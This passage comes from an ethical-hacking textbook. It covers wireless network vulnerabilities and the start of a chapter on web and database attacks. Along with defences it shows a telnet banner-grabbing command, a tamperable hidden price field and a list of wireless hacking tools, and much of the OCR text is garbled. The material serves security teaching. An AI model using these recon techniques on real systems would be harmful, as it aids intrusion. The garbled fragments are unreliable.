wails a random period of time before trying again. CSMA/CD Versus CSMA/CA CHAPTER 8 Wireless Vulnerabilities 197 APs offer a tremendous range of capabilities that dictate how the network operates. When choosing an AP H an organization needs to consider its goals, because choosing the wrong AP can severely hamper the performance of the net. For example, in large enterprises the consumer grade AP that can be purchased at an electronics retailer would be completely inappropriate in most cases due to its inability to offer enterprise security and management features. An item that is present in wireless networks but not in wired networks is the access point ( AP). An AP is a device that wireless clients associate to in order to gain access to the network [more on that later). In order for a wireless client to gain access to the services offered on the wired network on which the AP is connected, it must first associate to it. APs come in many different types, with a diverse range of capabilities from the consumer to commercial grade. The choice of tin AP can have a substantial impact on the overall performance and available features of the network, including range, security, and installation options. Service Set Identifier (SSID) A detail that is universally available in wireless networks is the service set identifier (SSID). The SSID is used to uniquely identify a network, thereby ensuring that clients can locate the correct wireless local area network (WLAN) ihm I hey should be attaching to. The SSID is attached to each packet as it is generated and is represented as a 32-character sequence uniquely identifying the network. The SSID is one of the first details that wireless clients will “see** w r hen connecting to a network, so a few things should be considered. First, in most APs the SSID is set to a default setting such as the manufacturer’s name (for example. 4 “Linksys h ‘ or ■ L dlmk ,t ), which should be changed to something more appropriate. Second, considerations should be made to turn off broadcast of I he SSID where appropriate. By default in most / \ There has been some debate about whether turning the SSID on or off is a good idea. On one side of the argument, turning it off makes it more difficult to locate an AP (but not impossible). In fact, some experts have argued that turning off the broadcast isn’t even worth doing because a serious attacker will find it more of a speed bump than a waH in finding your network. On the other hand, turning the SSID broadcast on makes it easier for legitimate clients to find the network as well as making t easier for an attacker to locate. The question you have to answer in your situation is what the tradeoff of security versus convenience is for your clients and organization. Role of APs Off or On 198 PART 2 | A Technical Overview of Hacking networks the SKID broadcast is turned on, which means that the ID will be b made els t unencrypted, in beacon frames. These beacon frames allow T clients to much more easily associate with their AR but also have the side effect of allowing software such as Netstu m bier to identify the network and find its physical location. Association with an AP Before a wireless client can work with a wireless network, a process known as association must take place. This process is actually quite simple, at least for our purposes, because association occurs when a wireless client has the SS I I) preconiigured for the network it is supposed to be attaching to. When it is configured in a wireless client, it will look for and then associate to the network whose value has been configured. The Importance of Authentication While not required, it is desirable to make sure that only those clients that you want to attach to your wireless netw T ork can do so. In order to restrict this access, authentication is performed prior to ihe association process. Authentication can be performed either in an open or preshared key situation, both offering features that may be desirable. With open keys, no secure authentication is performed and anyone can connect. When using this mode, no encryption is performed, so all information is sent in the clear unless another mechanism provides this feature. In preshared key (PSK) situations, both the AP and client have the same key entered ahead of time and therefore can authenticate and Eissociate securely. This also has the benefit of encrypting traffic as well. Working with RADIUS In some organizations it is possible that you may have existing tools or infrastructure in place that can be used to authenticate wireless clients. One of these options is RADIOS or Remote Authentication Dial-In User Service, The RADIUS service is one that is designed to centralize authentication, authorization h and Eiccounting, or AAA. The service allows user accounts and their authorization levels to be stored on a single server and have all authentication and authorization requests forwarded to this location. By consolidating management in this manner it is possible to simplify administration and management of the network by making a single location to carry out these tasks. [n practice when a user connects to wireless access point, his or her connection request can be forwarded to a RADIUS server. This request is then authenticated, authorized, and recorded (accounted), and access takes place as authorized, Network Setup Options Wireless networks and APs can relate in two ways: ad hoc or through infrastructure. Each of these options has advantages and disadvantages that make them attractive options. The following sections show you how they work. ^NOTE RADIUS is available on a wide range of operating systems and is supported by a wide range of enterprise level access points. CHAPTER 8 Wireless Vulnerabilities 199 Ad Hoc Network Ad hoc networks can be created very quickly Eind easily because no AP is required in their setup. Ad hoc networks can be thought of els peer-to-peer networks in which each client can attach to any other client to send and receive inform a lion .These clients or nodes become part of one network sharing a form of SSI I) known as an Independent Basic Service Set (IBSS). While these networks are quick to set up, which is the primary advantage, they do not scale well because they become harder to manage and less secure as the number of clients grows. Infrastructure Network Infrastructure-based wireless networks are networks that use an AP that each client associates to. Each client in the network setup will be configured to use the SSID of the AP that will be used to send and receive inform titi on. This type of network scales very well compared with the ad hoc-based networks and is much more likely to be used in production environments. Additionally, infrastructure networks can scale to a much larger degree by simply adding more APs to create what is known as an extended service set (ESS). Threats to Wireless LANs Wireless networks offer many ben el its similar to wired networks, but differ in the threats they face. Wireless networks have many threats that are unique to the way the technology works and each must be understood thoroughly prior to deploying the proper defenses. Wardriving Wardriving is the process of an attacker traveling through an area with the goal of detecting wireless APs or devices. An attacker who wants to engage in wardriving can do so with very basic equipment, usually a notebook with a wireless card and special software designed to detect wireless networks, In most cases those engaging in wardriving are looking to get free Internet access; however it is more than possible for them to do much worse, such as accessing computers on the network, spreading viruses, or even downloading illegal software on someone else’s dime, Wardriving has led to a family of so-called “war 11 attacks that are all variations of the same concept: • Wa rw a I ki n g — A ttacker s use a vvirele ss-en ab I ed de v ice to de tect w ireless networks as they walk around an area. • War biking — Same technique as war walking, but on a bike • Wa rf I y In (J — Relat i vely ad va n c ed te c h n iq u e i Ji a t req li i res t h e s a m e equip m ent as wardriving* but the process uses an aircraft instead of a car • W^i ballooning — An attacker places a GPS and wireless detection gear on a cluster of small balloons and lets them float over an area. The device is later retrieved and the data imported into the appropriate software. 200 PA RT 2 A Tech n ica I Overview of H ack i n g X Marks the Spot Another activity that occurs with ail the “war” activities is warchalking. Someone finds a wireless network and places a marker identifying an AP on a curb, sign, wall, or other location. Warchalkers have developed their own symbols to mark locations and the type of AP {open, secured, and so on) that can be looked up online. The name comes from their usage of chalk to mark symbols in these locations. Misconfigured Security Settings Every AP, piece of software, or associated hardware has recommended security settings provided by the vendor by default or in the instruct ion booklet. In a vast number of cases, such as residential or small businesses, APs end up getting implemented without these most basic of settings configured. In some cases, such as with consumer-grade APs, the default settings on the equipment allow the device to work “out of the box,” meaning that those that don’t know otherwise will assume that everything is OK as is. Unsecured Connections Another concern with wireless security is what employees or users may be attaching to. It has been shown that at least 25 percent of business travelers attach to unsecured APs in locations such as hotels, airports, coffee shops, and other locations. This number is expected to increase as companies allow more individuals to travel and work in the field with the associated notebooks and similar dei r ices. The concern with this situation Plug and Pray? It is not uncommon for home users or small businesses to purchase a consumer grade wireless router or AP and then simply plug it in and hope it works. In most cases, the manufacturer of a given piece of hardware configures the device so it will work out of the box to eliminate potential frustration on the part o1 the user when the device doesn’t just plug in and work like a TV. The problem is that if a consumer plugs in a device such as a wireless router and it already works, he or she more than likely will not take the basic steps to secure it. In other cases consumers have the attitude that they have nothing an attacker would want. It is not uncommon for a user to believe that the data is what an attacker wants,, totally forgetting about the APs. V CHAPTER 8 Wireless Vulnerabilities Here, There, Everywhere Rogue APs can appear anywhere and attackers know this — but so do businesses. Some businesses have taken advantage of the basic human desire to get something for nothing, such as Internet access. For example, several businesses have placed rogue APs in different locations up and down the Las Vegas strip, tn most cases, the APs are located outside large hotels where people will try to connect instead of paying the hotel to use their Internet. The problem with these APs is that many of them go to only one site that may offer anything from travel and entertainment to adult services.. is twofold: what users are transmitting and what is stored on their systems. Transmitting information over an unsecured AP can he extremely problematic and users who leave wireless access such as Bluetooth enabled on a notebook or cell phone may open them- selves up to data theft or other dim yen) us situations. Rogue APs A problem with wireless is the appearance of rogue APs that have been installed without authorization. The problem with rogue APs comes on a few fronts because they are unmanaged, unknown, and unsecured in most cases. Rogue APs that are installed without the knowledge of the IT department are by their very nature unmanaged and have no controls placed upon them. They are known only to specific un1i\ id – 1 a Is. ;KHb tiood and bad. I : bially. A IN installed jn 1his situation are frequently subject to little or no security* leading to unrestricted access by any party that locates the AR A new twist on rogue APs adds an element of phishing. In this attack, an attacker creates a rogue AP with a name that looks the same or is the same as a legitimate AP with the intention that unsuspecting users will attach to it. Once users attach to this AP, their credentials can be captured by the attacker. By using the same method, an attacker can even capture sensitive data as it is transmitted over the network. Promiscuous Clients Promiscuous clients are APs that are configured to offer strong signals and the offer of good performance. The idea behind these types of APs is that a victim will notice the AP and how strong the signal is and how good the performance is, and then attach to it. When these APs are nearby, they may be owned by an attacker who has the same goals as the malicious owner of a rogue AP: to capture information . 202 PART 2 A Technical Overview of Hacking Wireless Network Viruses Viruses e\tsl thai Lite speciiicalh designed in Leverage the strengths and weaknesses of wireless technologies. Wireless viruses are different because they can replicate quickly using the wireless network, jumping from system to system with relative ease. For example, a virus known as MVW-WIFI can replicate through wireless networks by using one system to detect other nearby wireless networks: it then replicates to those networks, at which poinl the process repeats. Protection on a wireless network is Eihsolutely essential to consider and consider carefully. There are several techniques that you may use to protect yourself and your employees from harm, these include: Firewalls — In the case of roaming or remote clients that connect to wireless networks at the office or at the local coffee shop or airport , a good personal firewall can provide a much needed level of protection. • Antivirus — An antivirus should be installed on every computer, and a wireless client is no exception, especially due to its higher exposure to threats. • VPN — A virtual private network can enhance protection to a high degree • by encrypting all traffic between the roaming client and the company network. By using this technique it is possible to work on a wireless network that has no protection itself and provide this through the VPN. Wireless Hacking Tools There are a number of wireless hacking tools available to the attacker who wants lu break into or discover wireless nei works. Some ol the more common ones include; • Kismet • Ketstumbler • Medieval Bluetooth Scanner • inSSlDer • Core impact • CFI LA Ng u a rd K et work S ec u rity Scan ner • Cow patty • Wireshark • NOTE While wireless viruses are restricted to 802.11 networks, they can and have appeared on other wireless technologies, including Bluetooth devices. In concept, 502.11 viruses and Bluetooth are the same, but the difference in practice is how they use their underlying technologies (wireless or Bluetooth). Countermeasures CHAPTER 8 Wireless Vulnerabilities 203 J 0 g£ Q t>^[f|i( “>^f«^ ^ 1 1 l;s : ham? Ch=n -i Type, r *Jz ^ n- ~i 1 — SNFU | Lt a sraiDs QMD22DkC8CCF NpCai ID Agc-it (Lurerlj Gnnaco AP -S3 1 1. J 17 ® 00501 DffHIW TP.- 3 Ago-Je (luaifVQ WavhLAN AP WTP ‘7! -1W M OR* 3 ■^n: ic :Lmj3wH) Cwhjes *P WEP ^7) in 2? B AP V*CP •79 ■m £1 1 .— r-ii. AP W£P •a? ■ io 1} lfc|iXD82SA3J93B & Lmkiyt AP V^EP -71 ILJ n 1 Agw* QjKWl) Orinoco AP -MTP -es -inn i? rWC?Q? £ CST(Uiksys.] AP -SB -iti NoCai-Setoe*i«H>l 114 AP 41 •i 1 Rawly r Not xmr] FIGURE 8-1 Netstumbler interface. Netstumbler Netstumbler is one of the more common tools ibr locating wireless networks of the 8 G2. 11 persuasion. The software is designed to detect any wireless network that your wireless network adapter supports (802. 1 1 n. 802,11b, 8()2.11g, and so on). The software also has the ability to interface with a OSR global positioning system (CPS) to map out the location of the APs it detects, usually within a good distance of the actual AP. Netstumbler does not have many options and is very simple to use (see Figure 8-1). inSSIDer While Netstumbler software offers a good amount of functionality, it is not the only product that can perform wireless network scanning. Another piece of software that can do the same thing is inSSIDer. Metageek. the makers of inSSIDer, describe the benefits of their tool as follows. NOTE Netstumbler alio comes in a version known as mini-stumbfer, designed especially for PDAs. 204 PART 2 A Technical Overview of Hacking Features unique to inSSlDer include: • Uses Windows Vista and Windows XP 64 -bit • Uses the Native Wi-Fi application protocol interface (API) and current wireless network card • Can group by Mac Address, SSI1X Channel, received .signal strength indicator (RSJ5I), and “Time Last Seen” • Compatible with most GPS devices (NMEA v2.3 and higher} The inSSlDer tool can do the following: • Inspect your WLAN and surrounding networks to troubles hoot competing APs Tnk’k i he strength oJ received signals in dRm (a measurement of decibels) over time • Filter APs in an easy-to-use format • Highlight APs for areas with high Wi-Fi concentration • Export Wi-Fi and GPS data to a Keyhole Markup Language (KML) file to view in Google Earth • ^ NOTE Netsturnbler has been a staple of ward riving techniques for awhile, but for all its popularity it does have some limitations, one of which is a lack of 64-bit support. The inSSlDer tool is a full featured replacement for Netst urn bier. E3 .,i I irtSSIDrr frit £ew ti^to (7) MAC Acid phi or Metsfraek ICS 31 PM 3.03 3T PN afl8 3tPM C 3 02 3U3 3CH 3 OS 3 36 107 3 1 M ( 5 5 M JIMI 1213 FIGURE 8 2 The inSSlDer interface CHAPTER 8 Wireless Vulnerabilities 205 The inSSlDer interface is shown in Figure 8-2. Once a target has been identified and Us identifying in format ion noted, the a Mack can begin. Protecting Wireless Networks Wireless networks can be secured if care is taken and knowledge of the vulnerabilities is possessed by the security professional. In some ways a wireless network can be secured like a wired network, but there are techniques specific to wireless networks that must be considered as welL Default AP Security Every AP ships with certain defaults already set; these should always be changed. Every manufacturer includes some guidance on what to configure on its APs; this advice should always be followed and mixed with a healthy dose of experience in what is best. Not changing the defaults on an AP can be a big detriment to security because the defaults tire generally posted on the manufacturer’s Web site. Placement Placement of a wireless AP can be a potent security measure if undertaken properly. An AP should be placed to cover the areas it needs to, and not as much of the ones it doesn’t. For example, an AP should not be located near a window if the people that will be connecting to it are deeper inside the building or only in the building. Positioning an AP near a window gives the signal more distance to emanate outside the building. Of course, other issues with placement need to be addressed, in particular the issue of interference. Placement of APs near sources of electromagnetic interference (EMI) can lead to unusable or unavailable APs, EMI can lead to APs being available to clients, but with such poor performance that it makes the technology worthless to the organization. Emanations Not much can be done about emanations in wireless network, but there is something that can be done to control the scope and range of these emanations. In some cases, wireless directional antennas can be used to concentrate or focus the signal tightly into a certain area instead of letting it go everywhere. One type of antenna is the Yagi antenna, which can focus a signal into a narrow beam, making it difficult to pick up by others outside the select area. ^NOTE Using a piece of software such as Netstumbler can discover APs, When one is detected, it is easy to look at the name of the AP and infer that whoever didn’t change the name from something such as “Linksys” or “dlink jr probably didn’t do anything else, either. 206 PA RT 2 A Tech nical Overview of H ack i ng Rogue APs Rogue APs are somewhat tough to stop, but they can be detected and deterred. The first action to address with rogue APs is the installation of unauthorized ones by employees. In this case h education is the first line of defense: let employees know that installation oi rogue APs is not allowed and why. Additionally, perform site surveys using tools such as Netstumbler, Kismet, or any number of commercial wireless site survey packages to detect rogue APs. The second issue to deal with is individuals connecting to the wrong or to unauthorized APs. In these cases education is again key. Let employees know the names of company-controlled APs and give them information about the dangers of connecting to unknown APs, Use Protection for Transmitted Data By its very nature, wireless data is transmitted so that anyone who wants to listen in can do so. In order to protect wireless networks an appropriate authentication technology should be used. The three that are currently in use are: • Wired Equivalent Privacy (WEP) — Mot much used anymore because it is weak and only marginally better than no protection at all. WEP was available on all first-generation wireless networks, but w r as replaced later with stronger technologies such as WPA. In theory, WEP was supposed to provide protection, hut in practice poor implemen- tation resulted in the use of weak keys. It was found that with enough weak keys simple cryptanalysis could be performed, and a W r EP passphrase can now be broken in a few minutes (sometimes 30 seconds). costs due to its well-known weaknesses. Using an alternative method such as WEP is listed here in the interest of completeness: however, in practice WEP should be avoided at all NOTE Wi-Fi Protected Access (WPA) — More robust than WEE it was designed to replace it in new r networks. WPA introduces stronger encryption and better key management that makes for a stronger system. WPA is supported on most wireless APs manufactured after 2003, and some manufactured prior to this can have their firmware upgraded. WPA should be used if the AP offers the ability to use WEP or WPA, WPA or WPA2 would be much more secure. Wi-Fi Protected Access version 2 (WPA2) — WPA 2 is an upgrade to WPA that introduces slronger encryption and eliminates a few T of the remaining weaknesses in WPA, CHAPTER 8 Wireless Vulnerabilities 207 Using the appropriate protection for a wireless network is important because it can protect the network from eavesdropping and other attacks in which Lin at Lacker can see network traffic. Of course, just having a good protection scheme does not make for a safe environment by itself; there are other factors. In the case of WPA and WPA2, the keys in use make a major difference for how effective the technology is. Using poorly chosen or short passwords (or keys) can weaken the protection and make it breakable by a knowledgeable attacker. When choosing a key it should be random, be of sufficient length, and adhere to the rules for complex passwords. MAC Filtering Media access control (MAC) address filtering is a way to enforce access control on a wireless network by registering the MAC addresses of wireless clients with the A P. Because the MAC address is supposed to be unique, clients are limited to those systems that have their MAC p reregistered. To set up MAC filtering you need to record the MAC addresses of each client that will use your AP and register those clients on the AR NOTE While MAC filtering does provide a level of protection, a determined attacker can get past it with some knowledge of how networks work, it is also very difficult to use in all but the smallest environments, as managing MAC lists can become very cumbersome. PTER SUMMARY Wireless communication and networking are technologies that have seen rapid growth and ad option over the past lew years. Many organisations have chosen to use wireless tedmototnes due to the increased mobility mid ijbUily lo ex let id networks thai wireless offers. Wireless has become one of the most widely used technologies by both consumers and businesses, and will most likely continue to be so. For all the benefits that wireless offers, the big concern for the security professional is security. Wireless technologies have many security issues, both real and potential, that must be addressed by the security professional. The technology suffers from poor or even overlooked security options by those who either Lid opted the technology too quickly or didn’t take the lime to understand the issues. This chapter explored how to use wireless technology m an organization, reaping its benefits and doing so securely, Like any technology, wireless can be used safely; it is only a matter of understanding the tools available lo make the system secure. To make wireless secure, you can leverage techniques such as encryption and authentication together with other features designed to make the system stronger and more LippeLiiiny lo the business. 20S PART 2 A Technical Overview of Hacking 4l KEY CONCEPTS AND TERMS 802.11 Bluebugging Bluejacking Sluesnarfing Multiple input and multiple output (Ml MO) Personal Area Met working (PAN) Preshared key (PSK) Wi-Fi Wireless local area network (WLAM) CHAPTER 8 ASSESSMENT 1 . Wireless refers to all the technologies that juake u [i 1H)±. ] E . A. True B. False 1. operates at 5 Ghz. A. ml Ala B. 802.11b C 802. llg 11 802.11ii is a short range wireless technology. 1. Which type of network requires an AP? A, Infrastructure E. Ad hoe <_\ Peer-to-peer I), Uk’nt Server 5. dlctate(s| the performance of a wireless network. A. Clients E. Interference C APs Jl All of the above 6. . blocks systems based on physical address. A, MAC Filtering E. Authentication C Association D. WEP 1. An Lid hoe network scales well in production environments. A. True B. False 1. Which of the following Is used to Identify a wireless network? A. SS1D E. IBSS C. Key 11 Frequency 1. Several APs group together form a(n) A. BSS B. SS1D C BBSS D. FBS 10. uses trusted devices. A. S02.ll B. Infrared C. Bluetooth D. CSMA Web and Database Attacks TODAY THE PUBLIC FACE of just about every organization is its Web site. Companies host all sorts of content on their servers with the intent that their customers or potential customers will be able to find out more about their products and services. A Web site is the first point of contact for customers and also an attractive target for an attacker. With a well-placed attack, an individual with an ax to grind can embarrass a company by defacing its Web site or even by stealing information. As a security professional, one of the tasks you will be charged with is safeguarding this asset and the infrastructure that is attached to it. Defending a Web server will require special care and knowledge to make the information and content available, but at the same time protect it from unnecessary exposure to threats. This task is trickier than it sounds because a balance has to be struck between making the content accessible to the appropriate audience while at the same time ensuring that it is secure. In addition, the Web server cannot be considered a standalone entity, because it will usually be attached to the organization’s own network, meaning threats against the server can flow over into the company network as well Making the situation more complex is the fact that Web servers may host not only regular Web pages but also Web applications and databases. More and more organizations are looking to Web services such as streaming video and Web applications such as SharePoint to make a more dynamic experience for their clients. Also, organizations are hosting ever- in creasing amounts of content such as databases online for a wide range of reasons. Each of these situations represents another detail that the security professional must address properly to make sure that the server and the organization itself are safe and secure. In this chapter you will learn how to deal with the issues revolving around Web servers, Web applications, and databases. The issues involved are a diverse group, but they can be properly dealt with if due care is exercised. Chapter 9 Topics This chapter covers the following topics and concepts: • What attacking Web servers is What examining an SQL injection is • What vandalizing Web servers is What database vulnerabilities are • Chapter 9 Goals When you complete this chapter, you will be able to: • List the issues facing Web servers • Discuss issues threatening Web applications • List the vulnerabilities of Web servers • List the vulnerabilities of Web applications • List the challenges that face a webmaster • Describe how to deface Web sites • Describe how to enumerate Web services • Describe how to attack Web applications • Describe the nature of buffer overflows • Describe the nature of input validation • List the methods of denial of service against Web sites • Describe SQL injections • Attacking Web Servers One of the popular targets tor attack is the Web server and its content. An attacker wanting to cause an organization grief can attack a server and steal information, vandalize a sile. disrupt services, or even cause a public relations nightmare for an organization. Consider the fact that the Web server is the public face that customers and clients quite often see first, so the security of the server and llie sites contained on it becomes even more of an issue to the security professional. CHAPTER 9 Web and Database Attacks 211 Before going too far look at Web servers through the eyes of the three classes of individuals who will be interacting or concerned with the health and wellbeing of the Web server: Server administrator — Concerned with the security of the server because it can provide an easy means of getting into the local network. It is not unlikely to have a Web server act as the entry point into the network for malicious code such as viruses, worms, Trojans, and rootkits. For server administrators, the problem becomes even more of a challenge because Web servers have become increasingly complex and feature-rich, with unknown or undocumented opiums that are left un ad dressed. Network administrator — Concerned with the fallout from the problems the server administrator may introduce or overlook. These security problems can lead to holes that can be exploited to gain access to the company netivork and the services therein. These administrators are aware that a Web server needs to be usable by the public and therefore accessible to the masses, but at the same time to be secure (which can be in conflict with the former goal). ■ End user — The individual who will work with the server the most to access content and services. Regular users just want to browse to a site and access their desired content; they do not think about things like Java and ActiveX and the very real security threats they may be introducing to their system. Making this more of an issue is the simple fact that the Web browser they are using to access this content can allow threats to bypass their or the company’s firewall and have a free ride into the internal network. Categories of Risk Risks inherent with Web servers can typically be broken into three categories, each of which will be examined in more detail. Each of the categories of risk can be matched to the environments in which each of the users operates: Defects and misc on figuration risks — Risks in this cute gory include the ability to steal information from a server, run scripts or exec u tables remotely, enumerate servers, and carry out denial of service (DoS) attacks. Attacks in this space are generally associated with the types of attacks a server administrator or webmaster would encounter. Browser- and network -based risks — Risks of this type include an attacker capturing network traffic between the client (W r eb browser) and server. Browser or client side risks — In this category are risks that affect the user’s system directly, such as crashing the browser, stealing information, infecting the system, or having some impact on the system, w NOTE Misconfiguration also covers the act of server administrators leaving default configurations in place. 212 PART 2 A Technical Overview of Hacking Vulnerabilities of Web Servers Web servers have a lot of the same vulnerabilities as any other servers — plus all the vulnerabilities associated with hosting content. Web servers can be the only face of companies that have no traditional locations (for example, Amazon and eBay), So yon must have a thorough understanding of the vulnerabilities that are present in this medium. Improper or Poor Web Design A potentially dangerous vulnerability seen in Web site design is what you aren’t supposed to see. Specifically, the comments and hidden tags that tire placed in a Web page by the Web designer. These items aren’t designed to be displayed in the browser, but a savvy attacker can observe these items by viewing the source code of the page: <f oxm method=” pos t ” action= ” . . / . – /cgi -bin/f ormMai I . pi “> < ‘ – – Regular FormMa i I options – –■-> <input type=hidden name = ” recipient” value= n sojiieone@s one place . com” ? <input type=hidden name = ” sub ject ” val ue=”Mes 5 age from website visitor”^ <input type=hidden name = ” required 11 val ue= n Name , Emai 1 1 Address 1 „City , State , Zip , Phone 1 “> <input type=hidden name=”redirect ” val ue=”ht tp :/ /www t someplace . com/received , htm”> <input type=h idden name = ” server name 11 value= n ht tps : //payments . somep I ace . conT’> <input type=hidden name= ” env_repor t 11 value= r, REMQTE_HOST t HTTP_USER_AGENT'”> <input type=hidden name= ” ti t le 11 val ue= 11 Form Results’ r > <input type=h idden name = ” r eturn_link_url ‘ value=”http : //www . somep lace . com/mai n , html “> <input type=h idden name = ” r eturn_l ink_ti tie’ value=”Back to Main Page “> <input type=hidden name=”missing_f ields_redirect” va lue = ” h t tp : //www , somep I ace . com/ error . html ” > <input type=hidden name= “order conf irmat ion” value= H orders@somep lace . com”> <input type=hidden name=”cc” val ue=” j , halak@somep!ace . com’ r > <input type=h idden name = “bcc” val ue= 1! c , pr ice@someplace . com “> < ! — Courtesy Reply Options – -> When looking at the code, there is some information that is useful to an attacker. While the information may not be completely actionable as far as something that can be attacked it does give us something. In the code notice the presence of e-mail addresses and even the presence of what appears to be a payment processing server [https:// panments.someplace.com). This is information that an attacker may use to target an attack. CHAPTER 9 Web and Database Attacks 213 The following is another ex el m pie of a vulnerability in code that can be exploited: <FORM ACTION -http://ll 1 . 1 1 1 . 1 1 1 . 1 11/cgi- bin/order .pi 11 method= ,l post ” <input type-hidden- name- “price” valLte= M GO©0 . 00″> <input type=hidden name=”prd_id” value=”Xl90″> QUANTITY: <i nput type=text name=”quan t ” size=3 max length=3 value=1> In this ex ei m pie. the Web designer has decided to use hidden fields to hold the price of an item. Unscrupulous attackers could change the price of the item from$6,000.00 to $60. £10 and make their own discount. Buffer Overflow A common vulnerability in Web servers, and all software t is the buffer overflow. A buffer overflow occurs when an application, process, or program attempts to put more data in a buffer than it was designed to hold. In practice, buffers should hold only a specific amount of data and no more. In the case of a buffer overflow, a programmer, either through lazy coding or other practices, creates a buffer in code, but does not put restrictions on it. Much like too much water poured into an ice cube tray, the delta must go someplace, which in this case means adjacent buffers. When data spills or overflows into the buffers it was not intended for, the result can be corrupted or overwritten data. In practice if this act occurs, the result can be that data loses its integrity. In extreme cases, buffer overwriting can lead to anything from a loss of system Integrity to the disclosure of in form Eit ion to unauthorized parties. NOTE Comments are not a bad thing to have in code; in fact, comments are a good feature to have when developing an application and should be retained in the original source code. Code that is published into a public area such as a Web site should have these comments removed or sanitized. NOTE Buffer overflows are not exclusive to Web servers, Web applications, or any application; they can be encountered in any piece of code that you may use. Denial of Service (DoS) Attack An attack that can wreak havoc with a Web server is the venerable DoS attack. As a fixed asset, a Web server is vulnerable to this attack much as any other server-based asset would he. When carried out against a Web server, all the resources on a Web server can be rapidly consumed, slowing down the performance of a server. A Do$ is mostly considered an
annoyance due to the ease at which it can be defeated.

Distributed Denial of Service (DDoS) Attack

Where a DoS attack is mostly an annoyance, the distributed denial of service (DDoS)
attack is much more of a problem. A DDoS accomplishes the same goal as a DoS: to
consume all the resources on a server and prevent it from being used by legitimate users.
The different between a DDoS and a DoS is scale, using the concept of economy of scale.
In a DDoS. many more systems are used to attack a target, crushing it under the weigh t
of multiple requests at once. In some cases, the attack can he launched from thousands
of servers at once against a target

214 PART 2 A Technical Overview of Hacking

Some of the more common DDoS attacks Include:

NOTE

Ping flooding attack — A computer sends a ping to another system with the
intention of uncovering information about the system, This attack can be scaled
up so that the p tickets being sent to a target will force the system to go offline
or suffer slowdowns.

• Smurf attack -Similar to the ping ilood attEick, but with a twist to the process.
In a Smurf attack, a ping command is sent to an intermediate network where
it is amplified and forw T arded to the victim. This single ping now becomes
a virtual tsunami of traffic.

SYN flooding — The equivalent of sending a letter that requires a return receipt;
however, the return address is bogus. If a return receipt is required and the return
address is bogus, the receipt will go nowhere, and a system waiting for confirmation
wili be left in limbo for some period of time. An attacker that sends enough SYN
requests to a system can use all the connections on a system so that nothing else
can get through.

IP fragmentation/fragmentation attack — Re quires an attacker
to use advanced knowledge of the Transmission Control
Protocol/Internet Protocol (TCP/IP) suite to break packets up
into “fragments” that can bypass most intrusion-detection
systems, In extreme cases, this type of attack can cause hangs,
lock-ups, reboots, blue screens, and other mischief.

When you make a request
for content to a Web server,
a piece of information known
as a content location header is
prefixed to the response. With
provides information such as IP
name (FQDN), and other data.

Banner Information

A banner can reveal a wealth of information about a Web server
for those who know how to retrieve it. Using a piece of software
such as Telnet or PuTTY, it is possible to retrieve this information

What’s in a banner? The following code illustrates what is returned from a banner:
HTTP/ 1.1 200 OK

Server: <web server name and version>

Con tent -Location: http: / / 192 . 1G3 . 100. 100/index .htm

Date: Wed, 12 May 2010 14:03:52 GMT

Content -Type : text/html

Atcept-Ranges : bytes

Last-Modified; Wed, 12 May 26 1 0 18:56:06 GMT
ETag ; “067dl36a639bel : ISbG”
Con tent -Length : 4325

CHAPTER 9 Web and Database Attacks

215

This header, which is easy to obtain, reveals information
Eibout the server that is being targeted, Web servers can have
this in form at ion sanitized, but the webmaster must actually
make the effort to do so,

This information can be returned quite easily from
a Web server using the following command:

telnet www . <servername> . com 80

Permissions

but the problem is they can easily be incorrectly configured.
Incorrectly assigned permissions have the potential to allow
accessible.

Error Messages

While they might not seem like a problem, error messages
can be a potential vulnerability as well giving vital information
to an attacker Error messages like 4fl4 for example, tell a visitor
that content is not available or located on the server. However
there are plenty of other error messages that can be gwen each
given different types of informal Ion from the very detailed to
the very obscure.

Table 9-1 displays error messages that may be displayed in a
Web browser or Web application when a connection is attempted
to a Web server or service.

The messages in Table 9-1 come directly from Microsoft’s
d eve I o pine n t d at ah a se.

Unnecessary Features

Servers should be purpose-built to the role they will fill in
the organisation; anything not essential to this role should
be eliminated, This process, known as hardening, will get rid
of the features, services, and applications that are not necessary
for the system to do its appointed job.

NOTE

Banners can be changed in
most Web servers to varying
degrees to meet the designer or
developer’s goats. You should
application or server to see what
you can configure and what is
practical to do.

MOTE

Permissions should always be
carefully assigned, configured,
and managed. Even better,
permissions should always be
documented to ensure that the
proper ones are in pEace.

Error messages should be
configured to be descriptive
when doing development and
testing, but when deployed into
a production environment they
should be sanitized.

I NOTE

Everything that is running
on a system — such as a service,
application, or process —
is running something that can
be targeted and exploited by
an attacker.

216 PART 2 A Technical Overview of Hacking

table 9-1 Partial

ist of IIS 6,0 messages.

MESSAGE NUMBER

DESCRIPTION

400

Cannot resolve the request.

401.1

Unauthorized; Access is denied due to invalid credentials.

401-2

Unauthorized; Access is denied due to server configuration favoring
an alternate authentication method.

1

Unauthorized; Access is denied due to an ACL set on the requested
resource.

401.4

Unauthorized; Authorization failed by a filter installed on the
Web server.

401.5

Unauthorized: Authorization failed by an ISAPI/CGI application.

401-7

Web server.

403

Forbidden: Access is denied.

403.1

Forbidden: Execute access is denied.

403.2

403.3

Forbidden: Write access is denied.

403.4

Forbidden: SSL is required to view this resource.

403.5

Forbidden: SSL 128 is required to view this resource.

403.6

Forbidden: IP address of the client has been rejected.

403.7

Forbidden: SSL client certificate is required.

403.8

Forbidden: DNS name of the client is rejected.

403.9

Forbidden: Too many clients are trying to connect to the Web server.

403.10

Forbidden: Web server is configured to deny Execute access.

403.11 Forbidden: Password has been changed,

TIP

Remember that discovering the
default accounts in an operating
system or environment is very
easy because the system vendor
generally has these details listed
on its Web site.

User Accounts

Most operating systems come precon figured wtlh a number of
user accounts and groups already in place. These accounts can
easily be discovered through a little research on an attacker’s
part. These accounts can be used to gain access to the system
in ways that can be used for no good.

CHAPTER 9 Web and Database Attacks

217

Structured Query Language (SQL) Injections

Structured Query Language (SQL) injections are designed to exploit applications that solicit
the client to supply data that Is processed in the form of SQL statements. An attacker
forces the SQL engine into executing commands unintended by the creator by supplying
specially crafted input. These commands force the application to reveal information that
is restricted.

• SQL injections are an exploit in which ihe attacker
“injects” SQL code into an input box or form with the
goal of gaining unauthorized access or alter data.
• Can be used to inject SQL commands to exploit
non-validated input vulnerabilities in a Web app
database.

• Can be used to execute arbitrary SQL commands
through a Web application.

• Examining an SQL Injection

SQL injections require considerable skill to execute, but
the effects can be dramatic. Simply put. SQL injections are
designed to exploit “holes H in the application. If an attacker
has the appropriate knowledge of the SQL language such
database on the Web site and the Web applications that
rely on it.

So what are the tools you will need to perform an SQL
injection? Not much in the scheme of things:

■ Web browser

• Knowledge of SQL
